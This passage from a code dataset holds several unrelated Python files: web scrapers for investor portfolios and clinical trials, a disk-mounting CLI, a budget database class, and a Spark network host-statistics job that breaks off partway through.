item))\n\nprint(new_router_cnf_file)\nprint(new_switch_cnf_file)\n\nwrite_new_cnf(new_router_cnf_file, router_output_file_name)\nwrite_new_cnf(new_switch_cnf_file, switch_output_file_name)\n\n","sub_path":"wanConfigGenerator/wanConfigRegExTestV0.0002_simple.py","file_name":"wanConfigRegExTestV0.0002_simple.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150024728","text":"'''\nPaint shop\n'''\n\nm = int(input(\"Area: \"))\n\nif m % 54 != 0:\n    latas = int(m / 54)+1\nelse:\n    latas = m / 54\n\nvalor = latas * 80\n\nprint(\"%d can(s) at a cost of %.2f\" %(latas, valor))\n","sub_path":"calculaTinta.py","file_name":"calculaTinta.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302777993","text":"import lxml.html as web\nimport pandas as pd\nimport requests\nfrom selenium import webdriver\nimport time\n\n\ndef getGuruPortfolios(numOfGurus):\n    url = 'https://www.gurufocus.com/guru/portfolio'\n\n    html = requests.get(url)\n    doc = web.fromstring(html.content)\n    all_data = {}\n    gurus = doc.xpath('//td[@data-column=\"Guru Name\"]')\n    guru_names = []\n\n    for i in range(len(gurus) - (40 - numOfGurus)):\n        guru_names.append(gurus[i].xpath('.//a[@class=\"guru-router-link\"]/text()')[0][1:])\n        browser = webdriver.Chrome('/Users/anay-mac/Downloads/chromedriver')\n        browser.get('https://www.gurufocus.com/guru/portfolio')\n\n        user = browser.find_elements_by_xpath('//a[@class=\"guru-router-link el-popover__reference\"]')\n        
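# clicking the i-th guru link opens its popover; the 'guru-menu-item' click below (index 1) then navigates to that guru's portfolio page\n        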
user[i].click()\n        time.sleep(2)\n        user = browser.find_elements_by_xpath('//a[@class=\"guru-menu-item\"]')\n        user[1].click()\n        time.sleep(2)\n\n        names = []\n        next = browser.find_element_by_class_name('btn-next')\n        length = browser.find_elements_by_class_name('number')\n        length = int(length[len(length) - 1].text)\n\n        for k in range(length):\n            bnames = browser.find_elements_by_xpath('//td[@class=\"table-company_name-info\"]')\n            for j in range(len(bnames)):\n                names.append([bnames[j].text])\n                if browser.find_elements_by_xpath('//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(j) + ']/td[9]/span[1]') != []:\n                    print(browser.find_elements_by_xpath('//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(j) + ']/td[9]/span[1]')[0].text)\n            next.click()\n            time.sleep(1)\n\n        browser.quit()\n        all_data[guru_names[i]] = names\n\n    return pd.DataFrame({tic : pd.Series(rev) for tic, rev in all_data.items()})\n\ndef getGuruTop10():\n    all_data = {}\n    names = []\n    browser = webdriver.Chrome('/Users/anay-mac/Downloads/chromedriver')\n    browser.get('https://www.gurufocus.com/guru/top-holdings')\n\n    next = browser.find_element_by_class_name('btn-next')\n    next.click()\n    time.sleep(2)\n    prev = browser.find_element_by_class_name('btn-prev')\n    prev.click()\n    time.sleep(2)\n\n    for i in range(1, 41):\n        names.append(browser.find_elements_by_xpath(\n            '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[1]/span[1]')[0].text)\n        temp = []\n        for obj in browser.find_elements_by_xpath(\n                '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[4]/div')[1:]:\n            temp.append(obj.text.split('\\n'))\n        all_data[names[i - 1]] = temp\n\n    next.click()\n    time.sleep(2)\n\n    for i in range(1, 28):\n        names.append(browser.find_elements_by_xpath(\n            '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[1]/span[1]')[0].text)\n        temp = []\n        for obj in browser.find_elements_by_xpath(\n                '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[4]/div')[1:]:\n            temp.append(obj.text.split('\\n'))\n        all_data[names[40 + (i - 1)]] = temp\n\n    browser.quit()\n    return pd.DataFrame({tic: pd.Series(rev, dtype='object') for tic, rev in all_data.items()})\n\nprint(getGuruPortfolios(2))","sub_path":"guru_data.py","file_name":"guru_data.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25156300","text":"import logging\nfrom src.budget import Budget\n\nmodule_logger = logging.getLogger('main.budget_line')\n\nclass Budget_line():\n    name = ''\n    id = 1\n\n    def __init__(self, id = 1, budget_line_name='None', budget_id=None):\n        self.id = id\n        self.name = budget_line_name\n        self.budget_id = budget_id\n        self.logger = logging.getLogger( 'main.budget_line.Budget_line' )\n\n\n    @property\n    def get_id(self):\n        return self.id\n\n\n    @property\n    def get_name(self):\n        return self.name\n\n\n    @classmethod\n    def create_table_budget_line( cls, my_db, table_name ):\n        \"\"\"Create new 'budget_line' table\"\"\"\n        cls.my_db = my_db\n        cls.table_name = table_name\n\n        cls.sql = \"CREATE TABLE IF NOT EXISTS {} (`id` int(11) NOT NULL AUTO_INCREMENT,\" \\\n                  \" `name` varchar(512) NOT NULL, \" \\\n                  \" `budget_id` int(11) NOT NULL,\" \\\n                  \" PRIMARY KEY (`id`),\" \\\n                  \" KEY `budget_id`(`budget_id`)\" \\\n                  \") ENGINE = InnoDB DEFAULT CHARSET = utf8 COLLATE = utf8_croatian_ci\".format( cls.table_name )\n\n        my_db.create_table( cls.sql 
)\n\n","sub_path":"src/budget_line.py","file_name":"budget_line.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305005064","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, unicode_literals, print_function\n\nimport numpy as np\n\n\nASDF_MAGIC = b'#ASDF '\nBLOCK_MAGIC = b'\\xd3BLK'\nBLOCK_HEADER_BOILERPLATE_SIZE = 6\n\n# The maximum number of blocks supported\nMAX_BLOCKS = 2 ** 16\nMAX_BLOCKS_DIGITS = int(np.ceil(np.log10(MAX_BLOCKS) + 1))\n\nYAML_TAG_PREFIX = 'tag:yaml.org,2002:'\nYAML_END_MARKER_REGEX = br'\\r?\\n\\.\\.\\.((\\r?\\n)|$)'\n\n\nSTSCI_SCHEMA_URI_BASE = 'http://stsci.edu/schemas/'\n\n\nBLOCK_FLAG_STREAMED = 0x1\n","sub_path":"pyasdf/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"231186362","text":"__author__ = 'puruppathak'\n\nimport csv\nfrom itertools import filterfalse, zip_longest\nfrom random import choice\nimport sys\nimport bs4\nimport lxml\nimport urllib.request\nfrom itertools import islice\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError\nimport xml.etree.ElementTree as ET\nimport re\nalist=[]\nalist2=[]\n\nOrgID=[]\nFDAOrg1=[]\nNCTID=[]\nBtitle=[]\nOverallStatus=[]\ncondition=[]\nagency=[]\ngender=[]\nMAge=[]\nPhase1=[]\nAgencyClass=[]\nStudyType=[]\nStudyDesign=[]\nSecID=[]\nFirstRecv=[]\nSDate=[]\nComplDate=[]\nLastChangedDate=[]\nVerificationDate=[]\nFirstRecvResultDate=[]\nPCD=[]\nCountries=[]\nCondition=[]\nIsFDA=[]\nIs801=[]\nIntervention=[]\nacronym=[]\nFDAOrg=[]\nRm_Countries=[]\nFirstRecvResultDispoDate=[]\n\n\nlist1 = ['2001']\n#drugname='belsomra'\n\n# Belsomra = ['001','002','003','004','005','006','007','008','009','010','011','012','013','015','016','017','018','020','021','022','023','024','025','026','027','028','029','032','035','036','038','039','040','041','042','055','056']\n\ndrugname = input(\"Enter the Drug name \")\nlist1 = [x.strip(' ') for x in list1]\nlen1 = len(list1)-1\nalist = [];\nstrURL1 = 'https://clinicaltrials.gov/ct2/results?term=%22'\nstrURL2 = '%22+AND+%22'\nstrURL3 = '%22+&Search=Searchdisplayxml=true'\n\nfor indic1 in list1:\n\n\n    strURL4 = strURL1 + drugname + strURL2 + indic1 + strURL3\n#req = urllib.request.urlopen('https://clinicaltrials.gov/show/NCT01487096?displayxml=true')\n# https://clinicaltrials.gov/ct2/results?term=%22Aubagio%22+AND+%222000%22+&Search=Searchdisplayxml=true\n\n\n\n    try:\n        req = urllib.request.urlopen(strURL4)\n        xml = bs4.BeautifulSoup(req, 'xml')\n        for item in xml.findAll('search_results'):\n            y=re.findall('(.*)',str(item))\n            len2 = len(y)\n            if y:\n                alist.append(y)\n                l = [indic1] * len2\n                FDAOrg1.append(l)\n                #FDAOrg.append(indic1)\n            else:\n                y1=re.findall('[^ ]* (.*)',str(item))\n                if y1:\n                    alist2.append(y1)\n            #print (\"NCT IS: \"+item.text)\n            #for i in range(0,len1):\n                #alist.append(item)\n    except URLError as e:\n        if hasattr(e, 'reason'):\n            print('We failed to reach a server.')\n            print('Reason: ', e.reason)\n        elif hasattr(e, 'code'):\n            print('The server couldn\\'t fulfill the request.')\n            print('Error code: ', e.code)\n    else:\n\n        print(\"Stage 1 processing ...\")\n\n\n\n\nfinal3=sum(FDAOrg1, [])\nfinal2=sum(alist2, [])\n\n\n\nfinal=sum(alist, [])\nprint(final)\nunique = set(final)\nresult = list(unique)\n\nstrURL11 = 
'https://clinicaltrials.gov/show/'\nstrURL21 = '?displayxml=true'\n\nfor indic11 in final:\n    strURL31 = strURL11 + indic11 + strURL21\n\n\n    try:\n\n\n        req2 = urllib.request.urlopen(strURL31)\n        xml = bs4.BeautifulSoup(req2, 'xml')\n\n        # (parent tag, child tag, target list) table replacing the original\n        # run of near-identical findAll/find/append blocks; behaviour is unchanged\n        fields = [\n            ('id_info', 'org_study_id', OrgID),\n            ('id_info', 'nct_id', NCTID),\n            ('clinical_study', 'brief_title', Btitle),\n            ('clinical_study', 'overall_status', OverallStatus),\n            ('clinical_study', 'condition', condition),\n            ('lead_sponsor', 'agency', agency),\n            ('eligibility', 'gender', gender),\n            ('eligibility', 'minimum_age', MAge),\n            ('clinical_study', 'phase', Phase1),\n            ('lead_sponsor', 'agency_class', AgencyClass),\n            ('clinical_study', 'study_type', StudyType),\n            ('clinical_study', 'study_design', StudyDesign),\n            ('id_info', 'secondary_id', SecID),\n            ('clinical_study', 'firstreceived_date', FirstRecv),\n            ('clinical_study', 'start_date', SDate),\n            ('clinical_study', 'completion_date', ComplDate),\n            ('clinical_study', 'lastchanged_date', LastChangedDate),\n            ('clinical_study', 'verification_date', VerificationDate),\n            ('clinical_study', 'firstreceived_results_date', FirstRecvResultDate),\n            ('clinical_study', 'firstreceived_results_disposition_date', FirstRecvResultDispoDate),\n            ('clinical_study', 'primary_completion_date', PCD),\n            ('clinical_study', 'location_countries', Countries),\n            ('clinical_study', 'removed_countries', Rm_Countries),\n            ('clinical_study', 'condition', Condition),\n            ('clinical_study', 'is_fda_regulated', IsFDA),\n            ('clinical_study', 'acronym', acronym),\n            ('clinical_study', 'is_section_801', Is801),\n        ]\n        for parent_tag, child_tag, target in fields:\n            for item in xml.findAll(parent_tag):\n                party = item.find(child_tag)\n                target.append(\"NULL\" if party is None else party.text)\n\n        for item in xml.findAll('clinical_study'):\n            y=re.findall('(.*)',str(item))\n            if y:\n                Intervention.append(y)\n            else:\n                Intervention.append(\"NULL\")\n\n\n\n    except URLError as e:\n        if hasattr(e, 'reason'):\n            print('We failed to reach a server.')\n            print('Reason: ', e.reason)\n        elif hasattr(e, 'code'):\n            print('The server couldn\\'t fulfill the request.')\n            print('Error code: ', e.code)\n    else:\n\n\n\n        print(\"Stage 2 processing..\")\n\n\n\nprint(FDAOrg)\nf = open('Full_temp_data.csv', 'wt')\ntry:\n    writer = csv.writer(f)\n    writer.writerow( ('FDA Org ID','Org ID', 'NCT ID','Brief Title','Condition','Overall status','Intervention name','Acronym','Agency','Gender','Minimum Age','Phase','Agency class','Study type','Study Design','Secondary ID','First received','Start Date','Completion date','Last changed date','Verification date','First received result date','Certificate of Delay/ Disposition 
Date','PCD','Countries','Removed countries','IS FDA regulated','IS section 801'))\n    #mylist = list(set(list01))\n    #mylist1 = list(set(list02))\n    #mylist2 = list(set(list03))\n    #for i1 in list11:\n    for i1,i2,i3,i4,i5,i6,i7,i8,i9,i10,i11,i12,i13,i14,i15,i16,i17,i18,i19,i20, i21, i22, i23,i24, i25, i26, i27,i28 in zip(final3, OrgID, NCTID, Btitle,Condition, OverallStatus,Intervention, acronym, agency, gender, MAge, Phase1, AgencyClass, StudyType, StudyDesign, SecID, FirstRecv, SDate, ComplDate, LastChangedDate, VerificationDate, FirstRecvResultDate, FirstRecvResultDispoDate, PCD, Countries, Rm_Countries, IsFDA,Is801):\n\n        writer.writerow( (i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11, i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22, i23, i24, i25,i26, i27,i28) )\nfinally:\n    f.close()\n\n# Writing faulty ID file:\n\nwith open('Missing.csv', 'w') as f:\n    writer = csv.writer(f)\n    for val in final2:\n        writer.writerow([val])\n\n\n\n\n\nf=open('Full_temp_data.csv', 'r')\ncsv_f = csv.reader(f)\n\n\n#name1 = input(\"Enter the Org ID \")\n#name2 = input(\"What's another drug name? \")\n#name3 = input(\"What's the sponsor's name?(If nothing, please enter NULL) \")\n#name4 = input(\"Is there any other name for the sponsor(If not, please enter NULL)? \")\n\n\n\n\nallTrials = []\nfirst_stage_cleared = []\nregistered_trials = []\npublished_trials = []\nreported_trials = []\ntimely_reported_trials = []\navailable_trials = []\n\nfor row in csv_f:\n    if(row[1] != \"\"):\n        allTrials.append(row)\n\n\nprint (\"number of trials analyzed is \" + str(len(allTrials)-1))\n\nfor row in allTrials:\n    for indic1 in list1:\n\n        if (indic1.lower() in str(row[1]).lower()):\n            registered_trials.append(row)\nprint (\"number of valid trials \"+str(len(registered_trials)))\nfor row in registered_trials:\n    print (row[1])\n\n\n\n\n\nStage1File = input(\"What would you like to name the output file as?(Eg: xyz.csv) \")\n\n\nf = open(Stage1File, 'wt')\ntry:\n    writer = csv.writer(f)\n    writer.writerow( ('FDA Org ID','Org ID', 'NCT ID','Brief Title','Condition','Overall status','Intervention','Acronym','Agency','Gender','Minimum Age','Phase','Agency class','Study Type','Study Design','Secondary ID','First received','Start Date','Completion date','Last changed date','Verification date','First received result date','Certificate of Delay/ Disposition Date','PCD','Countries','IS FDA regulated','IS section 801'))\n\n    for i1 in (registered_trials):\n\n        writer.writerow( (i1) )\nfinally:\n    f.close()\n\n\n\n\n","sub_path":"ReplAlgoBeta1.py","file_name":"ReplAlgoBeta1.py","file_ext":"py","file_size_in_byte":12830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"476974282","text":"\"\"\"\nUdiskie CLI logic.\n\"\"\"\n__all__ = [\n    # entry points:\n    'daemon',\n    'mount',\n    'umount',\n    ]\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", \".*could not open display.*\", Warning)\nwarnings.filterwarnings(\"ignore\", \".*g_object_unref.*\", Warning)\n\nimport os\nimport logging\nfrom functools import partial\n\nCONFIG_PATH = 'udiskie/filters.conf'\n\n#----------------------------------------\n# Utility functions\n#----------------------------------------\ndef load_filter(filter_file=None):\n    \"\"\"Load mount option filters.\"\"\"\n    import udiskie.match\n    if not filter_file:\n        try:\n            from xdg.BaseDirectory import xdg_config_home\n        except ImportError:\n            xdg_config_home = os.path.expanduser('~/.config')\n        filter_file = os.path.join(xdg_config_home, CONFIG_PATH)\n    return 
udiskie.match.FilterMatcher((filter_file,))\n\ndef common_program_options():\n    \"\"\"\n    Return a command line option parser for options common to all modes.\n    \"\"\"\n    import optparse\n    parser = optparse.OptionParser()\n    parser.add_option('-v', '--verbose', action='store_const',\n                      dest='log_level', default=logging.INFO,\n                      const=logging.DEBUG, help='verbose output')\n    return parser\n\ndef mount_program_options():\n    \"\"\"\n    Return the mount option parser for the mount command.\n    \"\"\"\n    parser = common_program_options()\n    parser.add_option('-f', '--filters', action='store',\n                      dest='filters', default=None,\n                      metavar='FILE', help='filter FILE')\n    parser.add_option('-P', '--password-prompt', action='store',\n                      dest='password_prompt', default='zenity',\n                      metavar='MODULE', help=\"replace password prompt\")\n    return parser\n\ndef connect_udisks(bus):\n    \"\"\"\n    Return a connection to the first udisks service found available.\n\n    TODO: This should check if the udisks service is accessible and if not\n    try to connect to udisks2 service.\n\n    \"\"\"\n    import udiskie.udisks\n    return udiskie.udisks.Udisks.create(bus)\n\n\n#----------------------------------------\n# Entry points\n#----------------------------------------\ndef daemon(args=None, udisks=None):\n    \"\"\"\n    Execute udiskie as a daemon.\n    \"\"\"\n    import gobject\n    import udiskie.automount\n    import udiskie.daemon\n    import udiskie.mount\n    import udiskie.prompt\n\n    parser = mount_program_options()\n    parser.add_option('-s', '--suppress', action='store_true',\n                      dest='suppress_notify', default=False,\n                      help='suppress popup notifications')\n    parser.add_option('-t', '--tray', action='store_true',\n                      dest='tray', default=False,\n                      help='show tray icon')\n    options, posargs = parser.parse_args(args)\n    logging.basicConfig(level=options.log_level, format='%(message)s')\n\n    # for now: just use the default udisks\n    if udisks is None:\n        import dbus\n        from dbus.mainloop.glib import DBusGMainLoop\n        DBusGMainLoop(set_as_default=True)\n        bus = dbus.SystemBus()\n        udisks = connect_udisks(bus)\n\n    # create daemon\n    daemon = udiskie.daemon.Daemon(udisks=udisks)\n    mainloop = gobject.MainLoop()\n\n    # create a mounter\n    prompt = udiskie.prompt.password(options.password_prompt)\n    filter = load_filter(options.filters)\n    mounter = udiskie.mount.Mounter(filter=filter, prompt=prompt, udisks=udisks)\n\n    # notifications (optional):\n    if not options.suppress_notify:\n        import udiskie.notify\n        try:\n            import notify2 as notify_service\n        except ImportError:\n            import pynotify as notify_service\n        notify_service.init('udiskie.mount')\n        notify = udiskie.notify.Notify(notify_service)\n        daemon.connect(notify)\n\n    # tray icon (optional):\n    if options.tray:\n        import udiskie.tray\n        create_menu = partial(udiskie.tray.create_menu,\n                              udisks=udisks,\n                              mounter=mounter,\n                              actions={'quit': mainloop.quit})\n        statusicon = udiskie.tray.create_statusicon()\n        connection = udiskie.tray.connect_statusicon(statusicon, create_menu)\n\n    # automounter\n    automount = udiskie.automount.AutoMounter(mounter)\n    daemon.connect(automount)\n\n    mounter.mount_all()\n    try:\n        return mainloop.run()\n    except KeyboardInterrupt:\n        return 0\n\ndef mount(args=None, udisks=None):\n    \"\"\"\n    Execute the mount command.\n    \"\"\"\n    import udiskie.mount\n    import udiskie.prompt\n\n    parser = mount_program_options()\n    parser.add_option('-a', '--all', action='store_true',\n                      dest='all', default=False,\n                      help='mount all present devices')\n    options, posargs = parser.parse_args(args)\n    logging.basicConfig(level=options.log_level, 
format='%(message)s')\n\n    # for now: just use the default udisks\n    if udisks is None:\n        import dbus\n        bus = dbus.SystemBus()\n        udisks = connect_udisks(bus)\n\n    # create a mounter\n    prompt = udiskie.prompt.password(options.password_prompt)\n    filter = load_filter(options.filters)\n    mounter = udiskie.mount.Mounter(filter=filter, prompt=prompt, udisks=udisks)\n\n    # mount all present devices\n    if options.all:\n        mounter.mount_all()\n        return 0\n\n    # only mount the desired devices\n    elif len(posargs) > 0:\n        mounted = []\n        for path in posargs:\n            device = mounter.mount(path)\n            if device:\n                mounted.append(device)\n        # automatically mount luks holders\n        for device in mounted:\n            mounter.mount_holder(device)\n        return 0\n\n    # print command line options\n    else:\n        parser.print_usage()\n        return 1\n\ndef umount(args=None, udisks=None):\n    \"\"\"\n    Execute the umount command.\n    \"\"\"\n    import udiskie.mount\n\n    parser = common_program_options()\n    parser.add_option('-a', '--all', action='store_true',\n                      dest='all', default=False,\n                      help='all devices')\n    parser.add_option('-e', '--eject', action='store_true',\n                      dest='eject', default=False,\n                      help='Eject drive')\n    parser.add_option('-d', '--detach', action='store_true',\n                      dest='detach', default=False,\n                      help='Detach drive')\n    (options, posargs) = parser.parse_args(args)\n    logging.basicConfig(level=options.log_level, format='%(message)s')\n\n    if len(posargs) == 0 and not options.all:\n        parser.print_usage()\n        return 1\n\n    # for now: use udisks v1 service\n    if udisks is None:\n        import dbus\n        bus = dbus.SystemBus()\n        udisks = connect_udisks(bus)\n    mounter = udiskie.mount.Mounter(udisks=udisks)\n\n    unmounted = []\n    if options.all:\n        if options.eject or options.detach:\n            if options.eject:\n                mounter.eject_all()\n            if options.detach:\n                mounter.detach_all()\n        else:\n            unmounted = mounter.unmount_all()\n    else:\n        unmounted = []\n        for path in posargs:\n            if options.eject or options.detach:\n                path = os.path.normpath(path)\n                if options.eject:\n                    mounter.eject(path, force=True)\n                if options.detach:\n                    mounter.detach(path, force=True)\n            else:\n                device = mounter.unmount(os.path.normpath(path))\n                if device:\n                    unmounted.append(device)\n\n    # automatically lock unused luks slaves of unmounted devices\n    for device in unmounted:\n        mounter.lock_slave(device)\n    return 0\n\n","sub_path":"udiskie/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"292934598","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/will/projects/moya/moya/moyaexceptions.py\n# Compiled at: 2015-09-01 07:17:44\nfrom __future__ import unicode_literals\nfrom .compat import implements_to_string\nfrom . 
import diagnose\nfrom .interface import AttributeExposer\n__all__ = [\n    b'MoyaException',\n    b'FatalMoyaException',\n    b'throw']\n\n@implements_to_string\nclass MoyaException(Exception, AttributeExposer):\n    fatal = False\n    __moya_exposed_attributes__ = [\n        b'type', b'msg', b'info', b'diagnosis']\n\n    def __init__(self, type, msg, diagnosis=None, info=None):\n        self.type = type\n        self.msg = msg\n        self._diagnosis = diagnosis\n        self.info = info or {}\n\n    @property\n    def diagnosis(self):\n        return self._diagnosis or diagnose.diagnose_moya_exception(self)\n\n    def __str__(self):\n        return (b'{}: {}').format(self.type, self.msg)\n\n    def __repr__(self):\n        return b'<MoyaException %s: %s>' % (self.type, self.msg)\n\n    def __moyaconsole__(self, console):\n        from . import pilot\n        console(self.type + b': ', fg=b'red', bold=True)(self.msg).nl()\n        if self.info:\n            console.obj(pilot.context, self.info)\n\n\nclass FatalMoyaException(MoyaException):\n    fatal = True\n\n\ndef throw(type, msg, diagnosis=None, info=None):\n    raise MoyaException(type, msg, diagnosis=diagnosis, info=info)","sub_path":"pycfiles/moya-0.6.20-py2.py3-none-any/moyaexceptions.py","file_name":"moyaexceptions.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539574077","text":"# -*- coding: utf-8 -*-\n\n#\n# MIT License\n#\n# Copyright (c) 2016 Tomas Jirsik \n# Institute of Computer Science, Masaryk University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\"\"\"\nDescription: A method for computing statistics for hosts in a network. The statistics\ncomputed for each host in each window are the following:\n - sum of flows, packets and bytes\n - average duration of flows\n - number of distinct destination ports\n - number of distinct communication peers\n\nUsage:\n  host_stats.py -iz <input-zookeeper-hostname>:<input-zookeeper-port> -it <input-topic> -oh\n    <output-hostname>:<output-port> -net <network-range-regex>\n\n  To run this on the Stream4Flow, you need to receive flows by IPFIXCol and make them available via Kafka topic. 
Then\n    you can run the example\n    $ ./run-application.sh ./host_statistics/host_statistics.py -iz producer:2181 -it ipfix.entry -oh consumer:20101 -net \"10\\.10\\..+\"\n\n\"\"\"\n\nimport sys  # Common system functions\nimport os  # Common operating system functions\nimport argparse  # Arguments parser\nimport ujson as json  # Fast JSON parser\nimport socket  # Socket interface\nimport re  # Parsing and matching regular expression\nimport time  # Time handling\n\nfrom termcolor import cprint  # Colors in the console output\n\nfrom pyspark import SparkContext  # Spark API\nfrom pyspark.streaming import StreamingContext  # Spark streaming API\nfrom pyspark.streaming.kafka import KafkaUtils  # Spark streaming Kafka receiver\n\n\ndef map_tcp_flags(bitmap):\n    \"\"\"\n    Maps text names of tcp flags to values in bitmap\n\n    :param bitmap: array[8]\n    :return: dictionary keyed by the names of the flags\n    \"\"\"\n    result = dict()\n    result[\"FIN\"] = bitmap[7]\n    result[\"SYN\"] = bitmap[6]\n    result[\"RST\"] = bitmap[5]\n    result[\"PSH\"] = bitmap[4]\n    result[\"ACK\"] = bitmap[3]\n    result[\"URG\"] = bitmap[2]\n    result[\"ECE\"] = bitmap[1]\n    result[\"CRW\"] = bitmap[0]\n    return result\n\n\ndef decimal_to_bitmap(decimal):\n    \"\"\"\n    Transfers a decimal number into an 8-bit bitmap\n\n    :param decimal: decimal number\n    :return: bitmap of 8 bits\n    \"\"\"\n    bitmap = map(int, list('{0:08b}'.format(decimal)))\n    return bitmap\n\n\ndef send_data(data, output_host):\n    \"\"\"\n    Send given data to the specified host using standard socket interface.\n\n    :param data: data to send\n    :param output_host: data receiver in the \"hostname:port\" format\n    \"\"\"\n\n    # Split outputHost hostname and port\n    host = output_host.split(':')\n\n    # Prepare a TCP socket.\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    # Connect to the outputHost and send given data\n    try:\n        sock.connect((host[0], int(host[1])))\n        sock.send(data)\n\n        # Print message of sent\n        now = time.strftime(\"%c\")\n        print(\"Data sent at: %s\" % now)\n\n    except socket.error:\n        cprint(\"[warning] Unable to connect to host \" + output_host, \"blue\")\n    finally:\n        sock.close()\n\n\ndef process_results(json_rrd, output_host):\n    \"\"\"\n    Transform given computation results into the JSON format and send them to the specified host.\n\n    JSON format:\n    {\"src_ipv4\":\"<source IPv4 address>\",\n     \"@type\":\"host_stats\",\n     \"stats\":{\n        \"total\":{\"packets\":<# of packets>,\"bytes\":<# of bytes>,\"flow\":<# of flows>},\n        \"avg_flow_duration\":<average flow duration>,\n        \"dport_count\":<# of distinct destination ports>,\n        \"peer_number\":<# of distinct communication peers>,\n        \"tcp_flags\":{\"FIN\":<# of FIN flags>, \"SYN\":<# of SYN flags>, ...}\n        }\n    }\n\n    :param json_rrd: Map in following format (src IP , (('total_stats', <# of flows>, <# of packets>, <# of bytes>),\n                                                        ('peer_number', <# of peers>),\n                                                        ('dport_count', <# number of distinct ports>),\n                                                        ('avg_flow_duration', <average flow duration>),\n                                                        ('tcp_flags', <tcp flags bitmap>)\n                                                       )\n                         )\n    :param output_host: results receiver in the \"hostname:port\" format\n    :return:\n    \"\"\"\n\n    results = \"\"\n\n    for ip, data in json_rrd.iteritems():\n\n        total_dict = {}\n        stats_dict = {\"total\": total_dict}\n        result_dict = {\"@type\": \"host_stats\", \"src_ipv4\": ip, \"stats\": stats_dict}\n\n        # Process total stats\n        total_dict[\"flow\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_flows\"]]\n        total_dict[\"packets\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_packets\"]]\n        total_dict[\"bytes\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_bytes\"]]\n\n        # Process peer_number stats\n        stats_dict[\"peer_number\"] = 
data[statistics_position[\"peer_number\"]][peer_number_position[\"peer_number\"]]\n\n        # Process dport_number stats\n        stats_dict[\"dport_count\"] = data[statistics_position[\"dport_count\"]][dport_count_position[\"dport_number\"]]\n\n        # Process average flow duration stats\n        stats_dict[\"avg_flow_duration\"] = data[statistics_position[\"average_flow_duration\"]][avg_flow_duration_position[\"avg_duration\"]]\n\n        # Process tcp flags sums\n        if data[statistics_position[\"tcp_flags\"]]:  # if statistics exist for a given host\n            stats_dict[\"tcp_flags\"] = map_tcp_flags(data[statistics_position[\"tcp_flags\"]][tcp_flags_position[\"tcp_flags_array\"]])\n\n        results += json.dumps(result_dict) + \"\\n\"\n\n    # Send results to a given socket\n    # print(results)  # Control print\n    send_data(results, output_host)\n\n\ndef count_host_stats(flow_json):\n    \"\"\"\n    Main function to compute per-host statistics for flow data in the JSON format.\n\n    :param flow_json: Initialized spark streaming context, windowed, json_loaded.\n    \"\"\"\n\n    # Create regex for monitored network\n    local_ip_pattern = re.compile(network_filter)\n\n    # Filter flows with relevant keys\n    flow_with_keys = flow_json.filter(lambda json_rdd: (\"ipfix.sourceIPv4Address\" in json_rdd.keys()) and\n                                                       (\"ipfix.destinationTransportPort\" in json_rdd.keys()) and\n                                                       (\"ipfix.flowStartMilliseconds\" in json_rdd.keys()) and\n                                                       (\"ipfix.flowEndMilliseconds\" in json_rdd.keys()) and\n                                                       (\"ipfix.protocolIdentifier\" in json_rdd.keys()) and\n                                                       (re.match(local_ip_pattern, json_rdd[\"ipfix.sourceIPv4Address\"]))\n                                      )\n\n    